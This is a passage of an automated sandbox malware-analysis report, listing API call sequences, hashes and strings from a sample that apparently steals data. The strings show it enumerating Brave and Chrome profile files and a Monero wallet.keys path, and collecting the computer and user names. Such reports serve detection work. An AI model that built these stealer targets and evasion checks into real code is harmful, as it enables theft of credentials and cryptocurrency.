                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$InfoNativeSystem
                              • String ID:
                              • API String ID: 1247124224-0
                              • Opcode ID: 70b7360bcc6c48aaf9bdd7ecce73291c7616594ee733ba8388f036bc90dcfd4f
                              • Instruction ID: 687a68e948cd4fbccf46c72e666533d5332537c146145a8e1273b992e2e65fd1
                              • Opcode Fuzzy Hash: 70b7360bcc6c48aaf9bdd7ecce73291c7616594ee733ba8388f036bc90dcfd4f
                              • Instruction Fuzzy Hash: 403139B240424E9FFF11DF50C848BEE3AA8FB05B14F144025EA01C2D55E7B65CA8CB59
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d9fd9838d87c20f18d09a4c9a10f8757e4fbbdcab4cfac84116e54d3b665372b
                              • Instruction ID: d50b3058b7adeb7b6ef82c084862ccf7184ee5d477b97d4fc05b3f0f6ca506f8
                              • Opcode Fuzzy Hash: d9fd9838d87c20f18d09a4c9a10f8757e4fbbdcab4cfac84116e54d3b665372b
                              • Instruction Fuzzy Hash: 290162F5944204EFD740DF98DD45FAABBB8F704B61F10422AE555A3380D37859008BA6
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004B112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 004B1132
                              • ExitProcess.KERNEL32 ref: 004B1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 02516f5f1b3f5607d876505ce93a3488eaf95873dedd292dded64b913e29915e
                              • Instruction ID: ecae6e923dbeba5f43f361d47fcfbf0b856b201300d35bc6f65f3a8f7b7bea7a
                              • Opcode Fuzzy Hash: 02516f5f1b3f5607d876505ce93a3488eaf95873dedd292dded64b913e29915e
                              • Instruction Fuzzy Hash: D0E086B0945308FBE7106FE4DC0AB5976B9AB04B41F501045F70C761D0C6F42601DA99
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004B10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004B10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: ee37af1c63ea29a5aca4e73542c6e5ca034bc19339ba1fce887beb772f6553bc
                              • Instruction ID: 85eaf6f0c8a51f8f6d961b1e23f3acc360b71f2c83914b551a4770298aaa2d51
                              • Opcode Fuzzy Hash: ee37af1c63ea29a5aca4e73542c6e5ca034bc19339ba1fce887beb772f6553bc
                              • Instruction Fuzzy Hash: 3AF0E2B1641208BBE714AAA4AC59FBBB7E8E705B15F301449F508E3390D572AE00CAA4
                              APIs
                                • Part of subcall function 004C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                                • Part of subcall function 004C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                                • Part of subcall function 004C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                                • Part of subcall function 004C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                                • Part of subcall function 004C7850: RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                                • Part of subcall function 004C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                              • ExitProcess.KERNEL32 ref: 004B11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: aea2721a39c0bcf5d269df57df09b4770b3533dc56b82cbf6c773e1c049601aa
                              • Instruction ID: 0084573136a055217c28127e946d0208b9d06df6cdc7133af3ad5f7a2f48e7ee
                              • Opcode Fuzzy Hash: aea2721a39c0bcf5d269df57df09b4770b3533dc56b82cbf6c773e1c049601aa
                              • Instruction Fuzzy Hash: 25E0ECB991420153DB4073F6AC1AF3A329D5B14749F04142EFA09D6212FA2DE810C97E
                              APIs
                              • wsprintfA.USER32 ref: 004C38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C38E3
                              • lstrcat.KERNEL32(?,?), ref: 004C3935
                              • StrCmpCA.SHLWAPI(?,004D0F70), ref: 004C3947
                              • StrCmpCA.SHLWAPI(?,004D0F74), ref: 004C395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C3C67
                              • FindClose.KERNEL32(000000FF), ref: 004C3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: ed583191c8e42f49262e66cf0607a2252b4dcd5539ef59fd43472825e3fc2f83
                              • Instruction ID: 8f505088b01c009137ca7a1c1483ec8cd08b5cc6756e274cdefee1f1cfc8dea3
                              • Opcode Fuzzy Hash: ed583191c8e42f49262e66cf0607a2252b4dcd5539ef59fd43472825e3fc2f83
                              • Instruction Fuzzy Hash: BBA144B5A002089BDB64DFA4DC85FFE7379BB48301F04858DE50D96141EB759B84CF66
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,004D0B32,004D0B2B,00000000,?,?,?,004D13F4,004D0B2A), ref: 004BBEF5
                              • StrCmpCA.SHLWAPI(?,004D13F8), ref: 004BBF4D
                              • StrCmpCA.SHLWAPI(?,004D13FC), ref: 004BBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BC7BF
                              • FindClose.KERNEL32(000000FF), ref: 004BC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 5efa547ddcdf29f1f0021673d73b861e615dfdea39395ae8c47068c5680e3476
                              • Instruction ID: 07b84cbb9f25d09f3126fa60ff3cb40eb26f17e1cab1acfd8dea37b141685fea
                              • Opcode Fuzzy Hash: 5efa547ddcdf29f1f0021673d73b861e615dfdea39395ae8c47068c5680e3476
                              • Instruction Fuzzy Hash: 5D4295759001086BCB54FB71DC96FED733DAB44308F40456EB90A92191EE38AF59CBBA
                              APIs
                              • wsprintfA.USER32 ref: 004C492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                              • StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                              • StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                              • FindClose.KERNEL32(000000FF), ref: 004C4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 2d3dd20e4916ca8d2173ed8f203ca5f3f2efa374201cf9fa11d30ddb17489e9b
                              • Instruction ID: 74da1eeb2daad9bf4b26c3aee106d89fe49534d872ac96a606737860a9350af8
                              • Opcode Fuzzy Hash: 2d3dd20e4916ca8d2173ed8f203ca5f3f2efa374201cf9fa11d30ddb17489e9b
                              • Instruction Fuzzy Hash: 2A6152B5900218ABCB60EBE0DD59FFA737DBB88700F04458EB50D96140EA75EB85CFA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004C4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C4587
                              • wsprintfA.USER32 ref: 004C45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C45BD
                              • StrCmpCA.SHLWAPI(?,004D0FC4), ref: 004C45EB
                              • StrCmpCA.SHLWAPI(?,004D0FC8), ref: 004C4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C468B
                              • FindClose.KERNEL32(000000FF), ref: 004C46A0
                              • lstrcat.KERNEL32(?,0118E200), ref: 004C46C5
                              • lstrcat.KERNEL32(?,0118D400), ref: 004C46D8
                              • lstrlen.KERNEL32(?), ref: 004C46E5
                              • lstrlen.KERNEL32(?), ref: 004C46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 0ed87950c620b1e737bfe66426581f633d9ad997f5b64d6774f82bbaa1350507
                              • Instruction ID: fafd45903f10486f990e0a56214ba62726778c45cdd62763b6270d044c8a6d3a
                              • Opcode Fuzzy Hash: 0ed87950c620b1e737bfe66426581f633d9ad997f5b64d6774f82bbaa1350507
                              • Instruction Fuzzy Hash: 885176B5500218ABC760EBB0DD99FFE737DAB58304F40458DB60D92150EB799B84CFA6
                              APIs
                              • wsprintfA.USER32 ref: 004C3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C3EDA
                              • StrCmpCA.SHLWAPI(?,004D0FAC), ref: 004C3F08
                              • StrCmpCA.SHLWAPI(?,004D0FB0), ref: 004C3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C406C
                              • FindClose.KERNEL32(000000FF), ref: 004C4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: d1df7232fafa5dc7ae84494cc291eb19cd8d17542ed2bbe994ce632f33049d5b
                              • Instruction ID: 88b20409446f0aa390e48f68e0aaadf0a69fc2ec2465c75258ee2b674a39bd10
                              • Opcode Fuzzy Hash: d1df7232fafa5dc7ae84494cc291eb19cd8d17542ed2bbe994ce632f33049d5b
                              • Instruction Fuzzy Hash: A35142F6900218ABCB24EBA0DC85FFA737DBB48304F40458DB65D96140DA799B85CF65
                              APIs
                              • wsprintfA.USER32 ref: 004BED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 004BED55
                              • StrCmpCA.SHLWAPI(?,004D1538), ref: 004BEDAB
                              • StrCmpCA.SHLWAPI(?,004D153C), ref: 004BEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BF2AE
                              • FindClose.KERNEL32(000000FF), ref: 004BF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: bf01abaf92eaf767ac9f80bc95e1485b7ce6be381491b72575ae753e4b945c29
                              • Instruction ID: 732296a75813256952124475540e7518014baa8cbcdcc4ddde6f7b0b7d7bd478
                              • Opcode Fuzzy Hash: bf01abaf92eaf767ac9f80bc95e1485b7ce6be381491b72575ae753e4b945c29
                              • Instruction Fuzzy Hash: EFE1107581111C9BDB94FB61DC52FEE7338AF54308F4045AEB40A62052EE386F9ACF69
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D15B8,004D0D96), ref: 004BF71E
                              • StrCmpCA.SHLWAPI(?,004D15BC), ref: 004BF76F
                              • StrCmpCA.SHLWAPI(?,004D15C0), ref: 004BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 004BFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
